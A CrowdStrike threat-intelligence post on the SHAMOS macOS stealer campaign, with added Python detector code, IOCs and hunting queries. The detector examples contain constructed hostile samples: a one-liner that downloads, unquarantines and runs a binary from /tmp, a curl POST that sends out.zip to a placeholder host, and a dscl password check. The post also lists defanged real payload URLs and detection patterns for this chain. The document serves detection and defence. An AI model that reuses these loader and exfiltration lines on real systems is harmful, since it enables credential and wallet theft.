Falcon Platform Prevents COOKIE SPIDER’s SHAMOS Delivery on macOS

CrowdStrike Blog
August 20, 2025 | Maddie Stewart - Suweera De Souza - Ash Leslie - Doug Brown | Engineering & Tech

Between June and August 2025, the CrowdStrike Falcon® platform successfully blocked a sophisticated malware campaign that attempted to compromise over 300 customer environments.


The campaign deployed SHAMOS, a variant of Atomic macOS Stealer (AMOS) developed by the cybercriminal group COOKIE SPIDER. Operating as malware-as-a-service, COOKIE SPIDER rents this information stealer to cybercriminals who deploy it to harvest sensitive information and cryptocurrency assets from victims. The campaign utilized malvertising to direct users to fraudulent macOS help websites where victims were instructed to execute a malicious one-line installation command.

This campaign underscores the popularity of malicious one-line installation commands among eCrime actors. This technique allows them to bypass Gatekeeper security checks and install the Mach-O executable directly onto victim devices. Cuckoo Stealer and SHAMOS operators have previously leveraged this method in Homebrew malvertising campaigns occurring between May 2024 and January 2025.

Details

In an exemplar campaign from June 2025, when the victim searches for a macOS-related issue — for example, “macos flush resolver cache” — they receive a promoted malvertising website in their search results (Figure 1).

Users located in multiple countries — including the U.S., UK, Japan, China, Colombia, Canada, Mexico, Italy, and others — received these advertisements; no victims were located in Russia. This is likely because Russian eCrime forums prohibit commodity malware operators from targeting users based in Russia and other countries belonging to the Commonwealth of Independent States (CIS).

Figure 1. Screenshot of search engine results with promoted malvertising website

One Google Advertising profile promoting this spoofed macOS help website appears to be a legitimate Australia-based electronics store, suggesting the eCrime actors responsible are likely spoofing the store name in their Google Advertising profile. This assessment is made with moderate confidence, as this profile’s promoted advertisement URLs appear to relate to macOS help pages — mac-safer[.]com and rescue-mac[.]com — and therefore do not align with the legitimate store’s business operations (Figure 2).

Figure 2. Google advertising profile

The fake help pages provide victims with false instructions for how to fix their problem (Figure 3).

Figure 3. False instructions displayed on macOS help pages

Both malvertising websites instruct the victims to copy, paste, and execute the following command in Terminal (Figure 4):

Figure 4. Malicious one-line installation command displayed on malvertising websites

The command decodes the Base64-encoded string aHR0cHM6Ly9pY2xvdWRzZXJ2ZXJzLmNvbS9nbS9pbnN0YWxsLnNo and downloads a file from https[:]//icloudservers[.]com/gm/install[.]sh.

This file is a Bash script that captures the user’s password and downloads a Mach-O executable from https[:]//icloudservers[.]com/gm/update (Figure 5).

Figure 5. Bash script contents

Since first reporting on this type of campaign in June 2025, CrowdStrike Counter Adversary Operations has continued to observe opportunistic eCrime threat actors leveraging malicious GitHub repositories to prompt victims to execute commands that download SHAMOS.

Similar to the aforementioned activity, campaign operators claim to offer a free download of a tool designed for macOS; these tools involve video editing software, computer-aided design (CAD) products, macOS performance tools, AI software, and dictation software. The threat actor(s) behind these pages continue to use the malicious one-line command to install SHAMOS. In some cases, the command is written entirely in plain text, and in others, the URL that hosts SHAMOS is Base64-encoded (Figure 6).

Figure 6. Samples of malicious one-line installation commands displayed on malvertising websites throughout July and August 2025

Installation/Execution

The malicious installation command downloads the SHAMOS Mach-O into the /tmp/ directory, removes extended file attributes using xattr (likely to bypass Gatekeeper checks), assigns executable permissions via chmod, and then executes the stealer. SHAMOS executes anti-VM commands to verify that the Mach-O is not executing in a suspected sandbox environment.
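As an added example (not code from the original post or from CrowdStrike), the following Python implements two defender-side checks suggested by the command and installation chain described above: recovering a download URL that a command line hides as a Base64 literal, and scoring script content for the dscl/curl/xattr/chmod sequence together with staging of a binary under /tmp. The one-liner and the script content in the block are constructed samples using the placeholder host example.invalid, not the campaign's own artifacts, and the scoring threshold is the example's own choice.

```python
import base64
import binascii
import re

# Binaries the installation chain on this page relies on: dscl (password check),
# curl (download), xattr (strip extended attributes), chmod (mark executable).
RISKY_TOKENS = ("dscl", "curl", "xattr", "chmod")

# Candidate Base64 literal: 16 or more alphabet characters plus optional padding.
_B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
_URL = re.compile(r"^https?://[^\s\"']+$")

# Constructed samples (placeholder host; not the real infrastructure).
SAMPLE_ONE_LINER = 'echo "aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvZ20vaW5zdGFsbC5zaA==" | base64 -d'
SAMPLE_SCRIPT = (
    'dscl . -authonly "$USER" "$pw" && '
    "curl -s https://example.invalid/gm/update -o /tmp/update && "
    "xattr -c /tmp/update && chmod +x /tmp/update && /tmp/update"
)


def decode_embedded_urls(command: str) -> list[str]:
    """Return each URL that is hidden as a Base64 literal inside a command string."""
    urls = []
    for token in _B64_TOKEN.findall(command):
        try:
            decoded = base64.b64decode(token, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not valid Base64 (e.g. a path fragment), or not text
        if _URL.match(decoded):
            urls.append(decoded)
    return urls


def assess_script(script: str) -> dict:
    """Score script content for the risky-binary chain the hunting query looks for."""
    tokens = [t for t in RISKY_TOKENS if re.search(rf"\b{t}\b", script)]
    stages_tmp = bool(re.search(r"/tmp/\S+", script))
    urls = decode_embedded_urls(script)
    return {
        "risky_tokens": tokens,
        "stages_tmp_binary": stages_tmp,
        "decoded_urls": urls,
        # Example threshold: three or more chain binaries plus either /tmp
        # staging or a hidden URL is enough to route the script to an analyst.
        "suspicious": len(tokens) >= 3 and (stages_tmp or bool(urls)),
    }


if __name__ == "__main__":
    print(decode_embedded_urls(SAMPLE_ONE_LINER))
    print(assess_script(SAMPLE_SCRIPT))
```

The Base64 scan deliberately tolerates false candidates: path fragments such as invalid/gm/update match the alphabet, but they fail strict decoding or do not decode to a URL, so only genuine encoded URLs are reported.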

The stealer then executes a variety of AppleScript commands for host reconnaissance and data collection tasks, including searching for known cryptocurrency-related wallet files and sensitive credential-based files on disk. SHAMOS attempts to exfiltrate collected sensitive files, including data from Keychain, AppleNotes, and browsers, using curl to transmit the data in a ZIP archive named out.zip (Figure 7).

Figure 7. Falcon UI detection on the SHAMOS binary execution from /tmp

SHAMOS downloads additional malicious payloads, including a spoofed Ledger Live wallet application and a botnet module, to the victim’s home directory as hidden files and assigns them executable permissions. The stealer also configures a Plist file named com.finder.helper.plist for persistence and saves it to the user’s LaunchDaemons directory if the victim has sudo privileges.
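As an added example, not from the original post or from CrowdStrike, the following Python audits launchd property lists for the persistence pattern described above: an entry whose program is a hidden file in the home directory (or runs from /tmp), or whose Label is the com.finder.helper value observed in this campaign. The two plists in the block are constructed samples with placeholder paths; audit_directory and the list of standard launchd directories are the example's own additions.

```python
import os
import plistlib
from xml.parsers.expat import ExpatError

# Persistence label reported for this campaign (from the write-up above).
KNOWN_BAD_LABELS = {"com.finder.helper"}

# Standard launchd locations on macOS; the per-user one is expanded at runtime.
LAUNCH_DIRS = ("/Library/LaunchDaemons", "/Library/LaunchAgents",
               os.path.expanduser("~/Library/LaunchAgents"))

# Constructed sample modelled on the described entry: a hidden file in the home
# directory started at load. The path and user name are placeholders.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>Label</key><string>com.finder.helper</string>
  <key>ProgramArguments</key>
  <array><string>/Users/victim/.helper</string></array>
  <key>RunAtLoad</key><true/>
</dict>
</plist>
"""

# Constructed benign entry for comparison.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>Label</key><string>com.example.backup</string>
  <key>ProgramArguments</key>
  <array><string>/usr/local/bin/backup</string><string>--daily</string></array>
  <key>RunAtLoad</key><true/>
</dict>
</plist>
"""


def audit_launch_plist(data: bytes, home: str = "/Users/victim") -> dict:
    """Flag a launchd plist whose program looks like a dropped stealer payload."""
    plist = plistlib.loads(data)
    args = plist.get("ProgramArguments") or []
    program = plist.get("Program") or (args[0] if args else "")
    label = plist.get("Label", "")
    reasons = []
    if label in KNOWN_BAD_LABELS:
        reasons.append(f"label {label} matches a known persistence label")
    if program.startswith(home.rstrip("/") + "/") and os.path.basename(program).startswith("."):
        reasons.append("program is a hidden file under the home directory")
    if program.startswith("/tmp/"):
        reasons.append("program runs from /tmp")
    if not program:
        reasons.append("no program path")
    return {
        "label": label,
        "program": program,
        "run_at_load": bool(plist.get("RunAtLoad", False)),
        "reasons": reasons,
        "suspicious": bool(reasons),
    }


def audit_directory(path: str, home: str) -> list:
    """Audit every .plist in one launchd directory; unparseable files are reported too."""
    findings = []
    if not os.path.isdir(path):
        return findings
    for name in sorted(os.listdir(path)):
        if not name.endswith(".plist"):
            continue
        full = os.path.join(path, name)
        try:
            with open(full, "rb") as fh:
                result = audit_launch_plist(fh.read(), home)
        except (OSError, plistlib.InvalidFileException, ValueError, ExpatError) as exc:
            result = {"label": name, "program": "", "run_at_load": False,
                      "reasons": [f"unparseable: {exc}"], "suspicious": True}
        result["path"] = full
        findings.append(result)
    return findings


if __name__ == "__main__":
    home = os.path.expanduser("~")
    for directory in LAUNCH_DIRS:
        for finding in audit_directory(directory, home):
            if finding["suspicious"]:
                print(finding["path"], finding["reasons"])
```

Unparseable files are reported as suspicious rather than skipped, because a plist launchd cannot read is itself worth a look on a host under investigation.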

CrowdStrike observed multiple commands, likely suggesting the eCrime actor was using SHAMOS’s botnet module (Figure 8).

Figure 8. Falcon UI detection demonstrating likely botnet module use

Additional Reporting

Open-source reporting detailed an additional malvertising campaign related to the observed activity. This campaign involved a GitHub repository masquerading as iTerm2’s GitHub repository, located at https[:]//github[.]com/jeryrymoore/Iterm2, that contained instructions detailing how to download iTerm2, a terminal emulator for macOS (Figure 9).[1] The malicious one-line installation command is nearly identical to the command used in the malvertising campaign; however, this campaign’s Bash script host URL is not Base64-encoded.

The Bash script — retrieved from https[:]//macostutorial[.]com/iterm2/install[.]sh — downloads SHAMOS from https[:]//macostutorial[.]com/iterm2/update.

Figure 9. GitHub repository containing fake iTerm2 installation instructions

CrowdStrike Falcon Coverage

CrowdStrike employs a layered approach to malware detection using machine learning and indicators of attack (IOAs). As shown in Figure 10, the CrowdStrike Falcon® sensor’s machine learning and behavior-based detection capabilities (IOAs) can automatically detect and prevent SHAMOS in the initial stages of the attack chain (i.e., as soon as the malware is downloaded onto the victim’s machine and at execution of the malicious shell script).

Additionally, IOAs can recognize malicious behavior at later stages in the attack chain, including when the threat actor attempts to employ tactics like data collection, persistence, execution of further binaries, and data exfiltration.

Figure 10. Falcon UI detection on execution of Bash script

Assessment

This campaign highlights that leveraging malvertising and the one-line installation-command technique to distribute macOS information stealers remains popular among eCrime actors.

Promoting fraudulent websites drives more site traffic, which leads to more potential victims. The one-line installation command enables eCrime actors to install the Mach-O executable directly onto the victim’s machine while bypassing Gatekeeper checks. CrowdStrike Counter Adversary Operations assesses that eCrime actors will likely continue to leverage both malvertising and one-line installation commands to distribute macOS information stealers.

This assessment is made with high confidence, as the combination has historically been successful, and these methods allow actors to bypass Gatekeeper checks.

Recommended Prevention Settings

To protect endpoints from this threat, CrowdStrike Falcon® Insight XDR customers should ensure the following prevention policy settings are configured:

• Suspicious process prevention
• Intelligence-sourced threat prevention

Threat Hunting Queries

The following CrowdStrike Falcon® Next-Gen SIEM Advanced Event Search queries are provided to assist defenders in hunting for this and similar activity across their endpoints.
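As an added example, not the post's own content, the following Python reproduces the matching logic of the two ProcessRollup2 hunting queries in this section (the osascript-under-/tmp parent/child join and the curl POST of out.zip) over constructed process events, together with the GraphExplorer link the queries build with format(). Field names follow the queries; the events, process IDs and the host example.invalid are constructed placeholders. Running it shows what each query should return for a known event set, which is useful when tuning the wildcard patterns before they go into Advanced Event Search.

```python
import fnmatch

# Constructed ProcessRollup2-style events. Fields follow the queries on this page;
# PIDs, command lines and the host example.invalid are placeholders.
SAMPLE_EVENTS = [
    {"aid": "a1", "TargetProcessId": 100, "ParentProcessId": 1,
     "ImageFileName": "/tmp/update", "FileName": "update", "CommandLine": "/tmp/update"},
    {"aid": "a1", "TargetProcessId": 101, "ParentProcessId": 100,
     "ImageFileName": "/usr/bin/osascript", "FileName": "osascript",
     "CommandLine": "osascript -e 'set x to 1'"},
    {"aid": "a1", "TargetProcessId": 102, "ParentProcessId": 100,
     "ImageFileName": "/usr/bin/curl", "FileName": "curl",
     "CommandLine": "curl -X POST -F file=@/tmp/out.zip https://example.invalid/upload"},
    # Benign activity: an osascript launched from Terminal and an ordinary curl GET.
    {"aid": "a1", "TargetProcessId": 200, "ParentProcessId": 1,
     "ImageFileName": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
     "FileName": "Terminal", "CommandLine": "Terminal"},
    {"aid": "a1", "TargetProcessId": 201, "ParentProcessId": 200,
     "ImageFileName": "/usr/bin/osascript", "FileName": "osascript",
     "CommandLine": "osascript -e 'display notification \"hi\"'"},
    {"aid": "a1", "TargetProcessId": 202, "ParentProcessId": 200,
     "ImageFileName": "/usr/bin/curl", "FileName": "curl",
     "CommandLine": "curl -s https://example.invalid/status"},
]


def _match(value, pattern):
    """Case-sensitive glob match, the same '*' semantics the queries use."""
    return fnmatch.fnmatchcase(str(value), pattern)


def graph_explorer_link(aid, pid, base="https://falcon.crowdstrike.com"):
    """Link the queries build with format(); set base to your Falcon cloud."""
    return f"[GraphExplorer]({base}/graphs/process-explorer/tree?id=pid:{aid}:{pid})"


def applescript_under_tmp(events):
    """Parent image under /tmp/ joined to an 'osascript -e' child on the same host."""
    parents = {(e["aid"], e["TargetProcessId"]): e
               for e in events if _match(e["ImageFileName"], "*/tmp/*")}
    hits = []
    for child in events:
        if not (_match(child["ImageFileName"], "*osascript")
                and _match(child["CommandLine"], "*-e*")):
            continue
        parent = parents.get((child["aid"], child["ParentProcessId"]))
        if parent is None:
            continue
        hits.append({"aid": child["aid"],
                     "GraphExplorer": graph_explorer_link(parent["aid"], parent["TargetProcessId"]),
                     "ImageFileName": parent["ImageFileName"],
                     "CommandLine": parent["CommandLine"],
                     "ChildImageFileName": child["ImageFileName"],
                     "ChildCommandLine": child["CommandLine"]})
    return hits


def curl_exfil(events):
    """curl processes whose command line carries a POST of out.zip."""
    return [e for e in events
            if e["FileName"] == "curl" and _match(e["CommandLine"], "*POST*out.zip*")]


if __name__ == "__main__":
    for hit in applescript_under_tmp(SAMPLE_EVENTS):
        print("osascript under /tmp:", hit["ImageFileName"], "->", hit["ChildCommandLine"])
    for ev in curl_exfil(SAMPLE_EVENTS):
        print("possible exfil:", ev["CommandLine"])
```

The join is keyed on (aid, process id) rather than on the process id alone, mirroring the per-sensor scope of the query; without the aid, two hosts that happened to reuse the same PID would produce spurious parent/child pairs.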

NOTE: Make sure to update the Falcon URL to the cloud in which your environment is currently configured (US1, US2, EU, etc.).

“Bash script execution with calls to risky LOLBins”

event_platform=Mac #event_simpleName=ScriptControlScanInfo ScriptContent="*dscl*curl*xattr*chmod*"
| format("[GraphExplorer](https://falcon.crowdstrike.com/graphs/process-explorer/tree?id=pid:%s:%s)", field=["aid", "TargetProcessId"], as=GraphExplorer)
| groupBy([aid, GraphExplorer, ScriptContent])

“AppleScript execution under a binary from /tmp/”

event_platform=Mac #event_simpleName=ProcessRollup2 ImageFileName="*/tmp/*"
| join({event_platform=Mac #event_simpleName=ProcessRollup2 ImageFileName="*osascript" CommandLine="*-e*" | rename(field="CommandLine", as="ChildCommandLine") | rename(field="ImageFileName", as="ChildImageFileName")}, field=TargetProcessId, key=ParentProcessId, include=["ChildImageFileName", "ChildCommandLine"], limit=20000)
// GraphExplorer is built the same way as in the first query so that groupBy() below has the field it references
| format("[GraphExplorer](https://falcon.crowdstrike.com/graphs/process-explorer/tree?id=pid:%s:%s)", field=["aid", "TargetProcessId"], as=GraphExplorer)
| groupBy([aid, GraphExplorer, ImageFileName, CommandLine, ChildImageFileName, ChildCommandLine])

“Curl with command line indicative of data exfil”

event_platform=Mac #event_simpleName=ProcessRollup2 FileName=curl CommandLine="*POST*out.zip*"
// GraphExplorer is built the same way as in the first query so that groupBy() below has the field it references
| format("[GraphExplorer](https://falcon.crowdstrike.com/graphs/process-explorer/tree?id=pid:%s:%s)", field=["aid", "TargetProcessId"], as=GraphExplorer)
| groupBy([aid, GraphExplorer, ImageFileName, CommandLine])

Indicators of Compromise (IOCs)

Description                                                    IOC
Malvertising websites containing instructions to download      mac-safer[.]com
SHAMOS                                                         https[:]//github[.]com/jeryrymoore/Iterm2
Bash script SHA256 hashes                                      231c4bf14c4145be77aa4fef36c208891d818983c520ba067dda62d3bbbf547f
                                                               eb7ede285aba687661ad13f22f8555aab186debbadf2c116251cb269e913ef68
Mach-O SHA256 hashes                                           4549e2599de3011973fde61052a55e5cdb770348876abc82de14c2d99575790f
                                                               b01c13969075974f555c8c88023f9abf891f72865ce07efbcee6c2d906d410d5
                                                               a4e47fd76dc8ed8e147ea81765edc32ed1e11cff27d138266e3770c7cf953322
Bash script host URLs                                          https[:]//icloudservers[.]com/gm/install[.]sh
SHAMOS host URLs                                               https[:]//icloudservers[.]com/gm/update
                                                               https[:]//macostutorial[.]com/iterm2/update

MITRE ATT&CK Framework

The following table maps reported COOKIE SPIDER and SHAMOS tactics, techniques, and procedures (TTPs) to the MITRE ATT&CK® framework.

ID          Technique                                               Description
T1583.001   Acquire Infrastructure: Domains                         The eCrime actor registered fake macOS help websites
T1189       Drive-by Compromise                                     Malvertising distributes websites containing installation instructions
T1204       User Execution                                          SHAMOS requires the user to execute the malicious installer command
T1027.010   Obfuscated Files or Information: Command Obfuscation    The malicious command uses Base64 encoding to obfuscate the Bash script download URL
T1105       Ingress Tool Transfer                                   The malicious Bash script downloads SHAMOS from an external URL

Additional Resources

Learn how CrowdStrike’s Threat Intelligence and Hunting solutions are transforming security operations to better protect your business.

Tune into the Adversary Universe Podcast, where CrowdStrike experts discuss today’s threat actors — who they are, what they’re after, and how you can defend against them. Download the CrowdStrike 2025 Global Threat Report and CrowdStrike 2025 Threat Hunting Report.

1. The legitimate iTerm2 GitHub repository is located at https[:]//github[.]com/gnachman/iTerm2.

